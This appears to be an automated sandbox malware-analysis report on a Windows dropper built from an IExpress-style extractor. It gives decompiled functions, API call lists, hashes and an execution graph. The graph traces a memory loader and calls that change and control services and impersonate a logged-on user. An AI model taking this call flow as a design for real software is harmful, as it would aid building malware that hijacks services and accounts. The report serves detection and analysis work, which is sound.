                              				void* __esi;
                              				signed int _t15;
                              				long _t28;
                              				struct _OVERLAPPED* _t37;
                              				void* _t39;
                              				signed int _t40;
                              
                              				_t15 =  *0xa78004; // 0x74742267
                              				_v8 = _t15 ^ _t40;
                              				_v272 = _v272 & 0x00000000;
                              				_push(__ecx);
                              				_v276 = _a16;
                              				_t37 = 1;
                              				E00A71781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                              				E00A7658A( &_v268, 0x104, _a12);
                              				_t28 = 0;
                              				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                              				if(_t39 != 0xffffffff) {
                              					_t28 = _a4;
                              					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                              						 *0xa79124 = 0x80070052;
                              						_t37 = 0;
                              					}
                              					CloseHandle(_t39);
                              				} else {
                              					 *0xa79124 = 0x80070052;
                              					_t37 = 0;
                              				}
                              				return E00A76CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                              			}















                              0x00a763cb
                              0x00a763d2
                              0x00a763d8
                              0x00a763ea
                              0x00a763f3
                              0x00a76401
                              0x00a76402
                              0x00a76410
                              0x00a76415
                              0x00a76433
                              0x00a76438
                              0x00a76449
                              0x00a76463
                              0x00a7646d
                              0x00a76477
                              0x00a76477
                              0x00a7647a
                              0x00a7643a
                              0x00a7643a
                              0x00a76444
                              0x00a76444
                              0x00a76492

                              APIs
                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00A7642D
                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00A7645B
                              • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00A7647A
                              Strings
                              • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00A763EB
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: File$CloseCreateHandleWrite
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                              • API String ID: 1065093856-3647970563
                              • Opcode ID: e673bc6200698e646f96931121d2e9692b4b21a298438430d59814d33577f368
                              • Instruction ID: 8255707115e3e285e5ad1b6e44cefa46e8347deee10c0cdf556567f1be0d22b9
                              • Opcode Fuzzy Hash: e673bc6200698e646f96931121d2e9692b4b21a298438430d59814d33577f368
                              • Instruction Fuzzy Hash: EB21D571A00218ABDB10DF65DC85FEB77B8EB94314F00C269F589A3180DBB05DC68F64
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00A747E0(intOrPtr* __ecx) {
                              				intOrPtr _t6;
                              				intOrPtr _t9;
                              				void* _t11;
                              				void* _t19;
                              				intOrPtr* _t22;
                              				void _t24;
                              				struct HWND__* _t25;
                              				struct HWND__* _t26;
                              				void* _t27;
                              				intOrPtr* _t28;
                              				intOrPtr* _t33;
                              				void* _t34;
                              
                              				_t33 = __ecx;
                              				_t34 = LocalAlloc(0x40, 8);
                              				if(_t34 != 0) {
                              					_t22 = _t33;
                              					_t27 = _t22 + 1;
                              					do {
                              						_t6 =  *_t22;
                              						_t22 = _t22 + 1;
                              					} while (_t6 != 0);
                              					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                              					 *_t34 = _t24;
                              					if(_t24 != 0) {
                              						_t28 = _t33;
                              						_t19 = _t28 + 1;
                              						do {
                              							_t9 =  *_t28;
                              							_t28 = _t28 + 1;
                              						} while (_t9 != 0);
                              						E00A71680(_t24, _t28 - _t19 + 1, _t33);
                              						_t11 =  *0xa791e0; // 0x2e18408
                              						 *(_t34 + 4) = _t11;
                              						 *0xa791e0 = _t34;
                              						return 1;
                              					}
                              					_t25 =  *0xa78584; // 0x0
                              					E00A744B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                              					LocalFree(_t34);
                              					L2:
                              					return 0;
                              				}
                              				_t26 =  *0xa78584; // 0x0
                              				E00A744B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                              				goto L2;
                              			}















                              0x00a747e8
                              0x00a747f0
                              0x00a747f4
                              0x00a7480f
                              0x00a74811
                              0x00a74814
                              0x00a74814
                              0x00a74816
                              0x00a74817
                              0x00a74829
                              0x00a7482b
                              0x00a7482f
                              0x00a7484f
                              0x00a74852
                              0x00a74855
                              0x00a74855
                              0x00a74857
                              0x00a74858
                              0x00a74860
                              0x00a74865
                              0x00a7486a
                              0x00a7486f
                              0x00000000
                              0x00a74876
                              0x00a74831
                              0x00a74841
                              0x00a74847
                              0x00a7480b
                              0x00000000
                              0x00a7480b
                              0x00a747f6
                              0x00a74806
                              0x00000000

                              APIs
                              • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00A74E6F), ref: 00A747EA
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00A74823
                              • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00A74847
                                • Part of subcall function 00A744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A74518
                                • Part of subcall function 00A744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A74554
                              Strings
                              • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00A74851
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Local$Alloc$FreeLoadMessageString
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                              • API String ID: 359063898-3647970563
                              • Opcode ID: 6f60ac24a48fa1c822c7a1a871e01ff5de400a1f8e049689f13cbcc64ca0d85f
                              • Instruction ID: 26f79373e849968c6838737f108230544b492279c4775c42977ce30ca2e6e891
                              • Opcode Fuzzy Hash: 6f60ac24a48fa1c822c7a1a871e01ff5de400a1f8e049689f13cbcc64ca0d85f
                              • Instruction Fuzzy Hash: 6411C2756046416FE715DF649C58F773BAAEBC9300F04C629FA8A9B341DB358C478760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00A73680(void* __ecx) {
                              				void* _v8;
                              				struct tagMSG _v36;
                              				int _t8;
                              				struct HWND__* _t16;
                              
                              				_v8 = __ecx;
                              				_t16 = 0;
                              				while(1) {
                              					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                              					if(_t8 == 0) {
                              						break;
                              					}
                              					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                              						continue;
                              					} else {
                              						do {
                              							if(_v36.message != 0x12) {
                              								DispatchMessageA( &_v36);
                              							} else {
                              								_t16 = 1;
                              							}
                              							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                              						} while (_t8 != 0);
                              						if(_t16 == 0) {
                              							continue;
                              						}
                              					}
                              					break;
                              				}
                              				return _t8;
                              			}







                              0x00a7368c
                              0x00a7368f
                              0x00a73691
                              0x00a7369f
                              0x00a736a7
                              0x00000000
                              0x00000000
                              0x00a736ba
                              0x00000000
                              0x00a736bc
                              0x00a736bc
                              0x00a736c0
                              0x00a736cb
                              0x00a736c2
                              0x00a736c4
                              0x00a736c4
                              0x00a736da
                              0x00a736e0
                              0x00a736e6
                              0x00000000
                              0x00000000
                              0x00a736e6
                              0x00000000
                              0x00a736ba
                              0x00a736ed

                              APIs
                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00A7369F
                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A736B2
                              • DispatchMessageA.USER32(?), ref: 00A736CB
                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A736DA
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Message$Peek$DispatchMultipleObjectsWait
                              • String ID:
                              • API String ID: 2776232527-0
                              • Opcode ID: ba57d2e27e22cf07de6d19407220b1e12f441ca6c41b79f7c564cd5f3ed16543
                              • Instruction ID: 6954256748eb17b6779212ffa5516ad41a86733c2073ea30c1d700bb07ab9cbe
                              • Opcode Fuzzy Hash: ba57d2e27e22cf07de6d19407220b1e12f441ca6c41b79f7c564cd5f3ed16543
                              • Instruction Fuzzy Hash: 1F01A7739002547BDF308BE65C48EEF767CEBC5F11F11821DF909E2180D560C681D660
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 77%
                              			E00A76517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                              				struct HRSRC__* _t6;
                              				void* _t21;
                              				struct HINSTANCE__* _t23;
                              				int _t24;
                              
                              				_t23 =  *0xa79a3c; // 0xa70000
                              				_t6 = FindResourceA(_t23, __edx, 5);
                              				if(_t6 == 0) {
                              					L6:
                              					E00A744B9(0, 0x4fb, 0, 0, 0x10, 0);
                              					_t24 = _a16;
                              				} else {
                              					_t21 = LoadResource(_t23, _t6);
                              					if(_t21 == 0) {
                              						goto L6;
                              					} else {
                              						if(_a12 != 0) {
                              							_push(_a12);
                              						} else {
                              							_push(0);
                              						}
                              						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                              						FreeResource(_t21);
                              						if(_t24 == 0xffffffff) {
                              							goto L6;
                              						}
                              					}
                              				}
                              				return _t24;
                              			}







                              0x00a7651f
                              0x00a7652a
                              0x00a76534
                              0x00a7656b
                              0x00a76577
                              0x00a7657c
                              0x00a76536
                              0x00a7653e
                              0x00a76542
                              0x00000000
                              0x00a76544
                              0x00a76547
                              0x00a7654c
                              0x00a76549
                              0x00a76549
                              0x00a76549
                              0x00a7655e
                              0x00a76560
                              0x00a76569
                              0x00000000
                              0x00000000
                              0x00a76569
                              0x00a76542
                              0x00a76587

                              APIs
                              • FindResourceA.KERNEL32(00A70000,000007D6,00000005), ref: 00A7652A
                              • LoadResource.KERNEL32(00A70000,00000000,?,?,00A72EE8,00000000,00A719E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A76538
                              • DialogBoxIndirectParamA.USER32(00A70000,00000000,00000547,00A719E0,00000000), ref: 00A76557
                              • FreeResource.KERNEL32(00000000,?,?,00A72EE8,00000000,00A719E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A76560
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Resource$DialogFindFreeIndirectLoadParam
                              • String ID:
                              • API String ID: 1214682469-0
                              • Opcode ID: 2e07d5bf7ae4596793c8c53e9572466220a7a7318042510dc141e5bd5e0bd6a1
                              • Instruction ID: 02bd670323ec12661f8a13d7b7b0e7ba2bb54f94be8cbac611d92c03f46f9e33
                              • Opcode Fuzzy Hash: 2e07d5bf7ae4596793c8c53e9572466220a7a7318042510dc141e5bd5e0bd6a1
                              • Instruction Fuzzy Hash: 1A012672100A05BBDB109FA99C08EBB7B6CEBC9761F04C125FE0C93190D7718C52EAA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 72%
                              			E00A765E8(char* __ecx) {
                              				char _t3;
                              				char _t10;
                              				char* _t12;
                              				char* _t14;
                              				char* _t15;
                              				CHAR* _t16;
                              
                              				_t12 = __ecx;
                              				_t15 = __ecx;
                              				_t14 =  &(__ecx[1]);
                              				_t10 = 0;
                              				do {
                              					_t3 =  *_t12;
                              					_t12 =  &(_t12[1]);
                              				} while (_t3 != 0);
                              				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                              				while(1) {
                              					_t16 = CharPrevA(_t15, ??);
                              					if(_t16 <= _t15) {
                              						break;
                              					}
                              					if( *_t16 == 0x5c) {
                              						L7:
                              						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                              							_t16 = CharNextA(_t16);
                              						}
                              						 *_t16 = _t10;
                              						_t10 = 1;
                              					} else {
                              						_push(_t16);
                              						continue;
                              					}
                              					L11:
                              					return _t10;
                              				}
                              				if( *_t16 == 0x5c) {
                              					goto L7;
                              				}
                              				goto L11;
                              			}









                              0x00a765e8
                              0x00a765ed
                              0x00a765ef
                              0x00a765f2
                              0x00a765f4
                              0x00a765f4
                              0x00a765f6
                              0x00a765f7
                              0x00a76608
                              0x00a76611
                              0x00a76618
                              0x00a7661c
                              0x00000000
                              0x00000000
                              0x00a7660e
                              0x00a76623
                              0x00a76625
                              0x00a7663b
                              0x00a7663b
                              0x00a7663d
                              0x00a76641
                              0x00a76610
                              0x00a76610
                              0x00000000
                              0x00a76610
                              0x00a76644
                              0x00a76647
                              0x00a76647
                              0x00a76621
                              0x00000000
                              0x00000000
                              0x00000000

                              APIs
                              • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00A72B33), ref: 00A76602
                              • CharPrevA.USER32(?,00000000), ref: 00A76612
                              • CharPrevA.USER32(?,00000000), ref: 00A76629
                              • CharNextA.USER32(00000000), ref: 00A76635
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Char$Prev$Next
                              • String ID:
                              • API String ID: 3260447230-0
                              • Opcode ID: 8a5de88ee8c3442c3fefa1448c470d1f3ab83de311408ebcc42641b9b25c98ae
                              • Instruction ID: 83c50343cfcb0f02393b0bc3a31128bfc6d9fbfd815fd77441cf04d168f5b520
                              • Opcode Fuzzy Hash: 8a5de88ee8c3442c3fefa1448c470d1f3ab83de311408ebcc42641b9b25c98ae
                              • Instruction Fuzzy Hash: 36F028320089907EE7365B798C88EBBBF9CCFDB355BA9C2BFE49D82001D6150D478661
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00A769B0() {
                              				intOrPtr* _t4;
                              				intOrPtr* _t5;
                              				void* _t6;
                              				intOrPtr _t11;
                              				intOrPtr _t12;
                              
                              				 *0xa781f8 = E00A76C70();
                              				__set_app_type(E00A76FBE(2));
                              				 *0xa788a4 =  *0xa788a4 | 0xffffffff;
                              				 *0xa788a8 =  *0xa788a8 | 0xffffffff;
                              				_t4 = __p__fmode();
                              				_t11 =  *0xa78528; // 0x0
                              				 *_t4 = _t11;
                              				_t5 = __p__commode();
                              				_t12 =  *0xa7851c; // 0x0
                              				 *_t5 = _t12;
                              				_t6 = E00A77000();
                              				if( *0xa78000 == 0) {
                              					__setusermatherr(E00A77000);
                              				}
                              				E00A771EF(_t6);
                              				return 0;
                              			}








                              0x00a769b7
                              0x00a769c2
                              0x00a769c8
                              0x00a769cf
                              0x00a769d8
                              0x00a769de
                              0x00a769e4
                              0x00a769e6
                              0x00a769ec
                              0x00a769f2
                              0x00a769f4
                              0x00a76a00
                              0x00a76a07
                              0x00a76a0d
                              0x00a76a0e
                              0x00a76a15

                              APIs
                                • Part of subcall function 00A76FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00A76FC5
                              • __set_app_type.MSVCRT ref: 00A769C2
                              • __p__fmode.MSVCRT ref: 00A769D8
                              • __p__commode.MSVCRT ref: 00A769E6
                              • __setusermatherr.MSVCRT ref: 00A76A07
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                              • String ID:
                              • API String ID: 1632413811-0
                              • Opcode ID: a50f4aab4d4c193a9a0cc8645eb8f2b97bc829d13c4fb79a5a38b2f43ee8edf8
                              • Instruction ID: 8a1644c797307ac19a5456339200759869cc9683a0b989917404cd819fb422cd
                              • Opcode Fuzzy Hash: a50f4aab4d4c193a9a0cc8645eb8f2b97bc829d13c4fb79a5a38b2f43ee8edf8
                              • Instruction Fuzzy Hash: C1F0F8B05487019FD714EBB0AE0E6593B61FB54331B50C619E46E862F1CF3E85C3CA12
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Execution Graph

                              Execution Coverage:3.5%
                              Dynamic/Decrypted Code Coverage:31.7%
                              Signature Coverage:15.9%
                              Total number of Nodes:353
                              Total number of Limit Nodes:34
                              execution_graph 25473 500920 TerminateProcess 25421 22fa1a8 25422 22fa226 ChangeServiceConfigA 25421->25422 25424 22fa4b2 25422->25424 25425 22f96a8 25427 22f9701 GetUserNameA 25425->25427 25428 22f9806 25427->25428 25429 22fa0e8 25430 22fa130 ControlService 25429->25430 25431 22fa167 25430->25431 25432 22f99e8 25433 22f9a3d OpenServiceA 25432->25433 25435 22f9ad4 25433->25435 25474 22f9ed8 25475 22f9f19 ImpersonateLoggedOnUser 25474->25475 25476 22f9f46 25475->25476 25477 50092b GetPEB 25478 500972 25477->25478 25436 50003c 25437 500049 25436->25437 25449 500e0f SetErrorMode SetErrorMode 25437->25449 25442 500265 25443 5002ce VirtualProtect 25442->25443 25445 50030b 25443->25445 25444 500439 VirtualFree 25448 5004be LoadLibraryA 25444->25448 25445->25444 25447 5008c7 25448->25447 25450 500223 25449->25450 25451 500d90 25450->25451 25452 500dad 25451->25452 25453 500dbb GetPEB 25452->25453 25454 500238 VirtualAlloc 25452->25454 25453->25454 25454->25442 25479 40cbdd 25480 40cbe9 __msize 25479->25480 25514 40d534 HeapCreate 25480->25514 25483 40cc46 25516 41087e GetModuleHandleW 25483->25516 25487 40cc57 __RTC_Initialize 25550 411a15 25487->25550 25490 40cc66 25491 40cc72 GetCommandLineA 25490->25491 25681 40e79a 63 API calls 3 library calls 25490->25681 25565 412892 25491->25565 25494 40cc71 25494->25491 25498 40cc97 25601 41255f 25498->25601 25502 40cca8 25616 40e859 25502->25616 25505 40ccb0 25506 40ccbb 25505->25506 25684 40e79a 63 API calls 3 library calls 25505->25684 25622 4019f0 OleInitialize 25506->25622 25509 40ccd8 25510 40ccea 25509->25510 25676 40ea0a 25509->25676 25685 40ea36 63 API calls _doexit 25510->25685 25513 40ccef __msize 25515 40cc3a 25514->25515 25515->25483 25679 40cbb4 63 API calls 3 library calls 25515->25679 25517 410892 25516->25517 25518 410899 25516->25518 25686 40e76a Sleep GetModuleHandleW 25517->25686 25519 410a01 25518->25519 25520 4108a3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 25518->25520 25708 410598 7 API calls __decode_pointer 25519->25708 25522 4108ec TlsAlloc 25520->25522 25526 40cc4c 25522->25526 25527 41093a TlsSetValue 25522->25527 25524 410898 25524->25518 25526->25487 25680 40cbb4 63 API calls 3 library calls 25526->25680 25527->25526 25528 41094b 25527->25528 25687 40ea54 6 API calls 3 library calls 25528->25687 25530 410950 25688 41046e TlsGetValue 25530->25688 25533 41046e __encode_pointer 6 API calls 25534 41096b 25533->25534 25535 41046e __encode_pointer 6 API calls 25534->25535 25536 41097b 25535->25536 25537 41046e __encode_pointer 6 API calls 25536->25537 25538 41098b 25537->25538 25698 40d564 InitializeCriticalSectionAndSpinCount ___lock_fhandle 25538->25698 25540 410998 25540->25519 25699 4104e9 6 API calls __crt_waiting_on_module_handle 25540->25699 25542 4109ac 25542->25519 25700 411cba 25542->25700 25546 4109df 25546->25519 25547 4109e6 25546->25547 25707 4105d5 63 API calls 5 library calls 25547->25707 25549 4109ee GetCurrentThreadId 25549->25526 25737 40e1d8 25550->25737 25552 411a21 GetStartupInfoA 25553 411cba __calloc_crt 63 API calls 25552->25553 25555 411a42 25553->25555 25554 411c60 __msize 25554->25490 25555->25554 25558 411cba __calloc_crt 63 API calls 25555->25558 25560 411b2a 25555->25560 25563 411ba7 25555->25563 25556 411bdd GetStdHandle 25556->25563 25557 411c42 SetHandleCount 25557->25554 25558->25555 25559 411bef GetFileType 25559->25563 25560->25554 25562 411b53 GetFileType 25560->25562 25560->25563 25738 41389c InitializeCriticalSectionAndSpinCount __msize 25560->25738 25562->25560 25563->25554 25563->25556 25563->25557 25563->25559 25739 41389c InitializeCriticalSectionAndSpinCount __msize 25563->25739 25566 4128b0 GetEnvironmentStringsW 25565->25566 25573 4128cf 25565->25573 25568 4128c4 GetLastError 25566->25568 25569 4128b8 25566->25569 25567 412968 25572 412971 GetEnvironmentStrings 25567->25572 25574 40cc82 25567->25574 25568->25573 25570 4128eb GetEnvironmentStringsW 25569->25570 25571 4128fa WideCharToMultiByte 25569->25571 25570->25571 25570->25574 25577 41295d FreeEnvironmentStringsW 25571->25577 25578 41292e 25571->25578 25572->25574 25575 412981 25572->25575 25573->25567 25573->25569 25590 4127d7 25574->25590 25579 411c75 __malloc_crt 63 API calls 25575->25579 25577->25574 25740 411c75 25578->25740 25581 41299b 25579->25581 25583 4129a2 FreeEnvironmentStringsA 25581->25583 25584 4129ae _realloc 25581->25584 25583->25574 25587 4129b8 FreeEnvironmentStringsA 25584->25587 25585 41293c WideCharToMultiByte 25586 41294e 25585->25586 25589 412956 25585->25589 25746 40b6b5 63 API calls 2 library calls 25586->25746 25587->25574 25589->25577 25591 4127f1 GetModuleFileNameA 25590->25591 25592 4127ec 25590->25592 25594 412818 25591->25594 25786 41446b 107 API calls __setmbcp 25592->25786 25780 41263d 25594->25780 25596 40cc8c 25596->25498 25682 40e79a 63 API calls 3 library calls 25596->25682 25598 411c75 __malloc_crt 63 API calls 25599 41285a 25598->25599 25599->25596 25600 41263d _parse_cmdline 73 API calls 25599->25600 25600->25596 25602 412568 25601->25602 25604 41256d _strlen 25601->25604 25788 41446b 107 API calls __setmbcp 25602->25788 25605 411cba __calloc_crt 63 API calls 25604->25605 25608 40cc9d 25604->25608 25611 4125a2 _strlen 25605->25611 25606 412600 25791 40b6b5 63 API calls 2 library calls 25606->25791 25608->25502 25683 40e79a 63 API calls 3 library calls 25608->25683 25609 411cba __calloc_crt 63 API calls 25609->25611 25610 412626 25792 40b6b5 63 API calls 2 library calls 25610->25792 25611->25606 25611->25608 25611->25609 25611->25610 25614 4125e7 25611->25614 25789 40ef42 63 API calls __recalloc 25611->25789 25614->25611 25790 40e61c 10 API calls 3 library calls 25614->25790 25618 40e867 __IsNonwritableInCurrentImage 25616->25618 25793 413586 25618->25793 25619 40e885 __initterm_e 25621 40e8a4 __IsNonwritableInCurrentImage __initterm 25619->25621 25797 40d2bd 74 API calls __cinit 25619->25797 25621->25505 25623 401ab9 25622->25623 25798 40b99e 25623->25798 25625 401abf 25626 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 25625->25626 25656 402467 25625->25656 25627 401dc3 CloseHandle GetModuleHandleA 25626->25627 25635 401c55 25626->25635 25811 401650 25627->25811 25629 401e8b FindResourceA LoadResource LockResource SizeofResource 25630 40b84d _malloc 63 API calls 25629->25630 25631 401ebf 25630->25631 25813 40af66 25631->25813 25633 401c9c CloseHandle 25633->25509 25634 401ecb _memset 25636 401efc SizeofResource 25634->25636 25635->25633 25639 401cf9 Module32Next 25635->25639 25637 401f1c 25636->25637 25638 401f5f 25636->25638 25637->25638 25851 401560 __VEC_memcpy __shift 25637->25851 25640 401f92 _memset 25638->25640 25852 401560 __VEC_memcpy __shift 25638->25852 25639->25627 25650 401d0f 25639->25650 25643 401fa2 FreeResource 25640->25643 25644 40b84d _malloc 63 API calls 25643->25644 25645 401fbb SizeofResource 25644->25645 25646 401fe5 _memset 25645->25646 25647 4020aa LoadLibraryA 25646->25647 25648 401650 25647->25648 25649 40216c GetProcAddress 25648->25649 25652 4021aa 25649->25652 25649->25656 25650->25633 25651 401dad Module32Next 25650->25651 25651->25627 25651->25650 25652->25656 25825 4018f0 25652->25825 25654 40243f 25654->25656 25853 40b6b5 63 API calls 2 library calls 25654->25853 25656->25509 25657 4021f1 25657->25654 25837 401870 25657->25837 25659 402269 VariantInit 25660 401870 76 API calls 25659->25660 25661 40228b VariantInit 25660->25661 25662 4022a7 25661->25662 25663 4022d9 SafeArrayCreate SafeArrayAccessData 25662->25663 25842 40b350 25663->25842 25666 40232c 25667 402354 SafeArrayDestroy 25666->25667 25668 40235b 25666->25668 25667->25668 25669 402392 SafeArrayCreateVector 25668->25669 25670 4023a4 25669->25670 25671 4023bc VariantClear VariantClear 25670->25671 25844 4019a0 25671->25844 25674 40242e 25675 4019a0 66 API calls 25674->25675 25675->25654 25866 40e8de 25676->25866 25678 40ea1b 25678->25510 25679->25483 25680->25487 25681->25494 25682->25498 25683->25502 25684->25506 25685->25513 25686->25524 25687->25530 25689 4104a7 GetModuleHandleW 25688->25689 25690 410486 25688->25690 25692 4104c2 GetProcAddress 25689->25692 25693 4104b7 25689->25693 25690->25689 25691 410490 TlsGetValue 25690->25691 25695 41049b 25691->25695 25697 41049f 25692->25697 25709 40e76a Sleep GetModuleHandleW 25693->25709 25695->25689 25695->25697 25696 4104bd 25696->25692 25696->25697 25697->25533 25698->25540 25699->25542 25703 411cc3 25700->25703 25702 4109c5 25702->25519 25706 4104e9 6 API calls __crt_waiting_on_module_handle 25702->25706 25703->25702 25704 411ce1 Sleep 25703->25704 25710 40e231 25703->25710 25705 411cf6 25704->25705 25705->25702 25705->25703 25706->25546 25707->25549 25709->25696 25711 40e23d __msize 25710->25711 25712 40e255 25711->25712 25722 40e274 _memset 25711->25722 25723 40bfc1 63 API calls __getptd_noexit 25712->25723 25714 40e25a 25724 40e744 6 API calls 2 library calls 25714->25724 25716 40e2e6 RtlAllocateHeap 25716->25722 25719 40e26a __msize 25719->25703 25722->25716 25722->25719 25725 40d6e0 25722->25725 25732 40def2 5 API calls 2 library calls 25722->25732 25733 40e32d LeaveCriticalSection _doexit 25722->25733 25734 40d2e3 6 API calls __decode_pointer 25722->25734 25723->25714 25726 40d6f5 25725->25726 25727 40d708 EnterCriticalSection 25725->25727 25735 40d61d 63 API calls 10 library calls 25726->25735 25727->25722 25729 40d6fb 25729->25727 25736 40e79a 63 API calls 3 library calls 25729->25736 25731 40d707 25731->25727 25732->25722 25733->25722 25734->25722 25735->25729 25736->25731 25737->25552 25738->25560 25739->25563 25743 411c7e 25740->25743 25742 411cb4 25742->25577 25742->25585 25743->25742 25744 411c95 Sleep 25743->25744 25747 40b84d 25743->25747 25745 411caa 25744->25745 25745->25742 25745->25743 25746->25589 25748 40b900 25747->25748 25757 40b85f 25747->25757 25774 40d2e3 6 API calls __decode_pointer 25748->25774 25750 40b906 25775 40bfc1 63 API 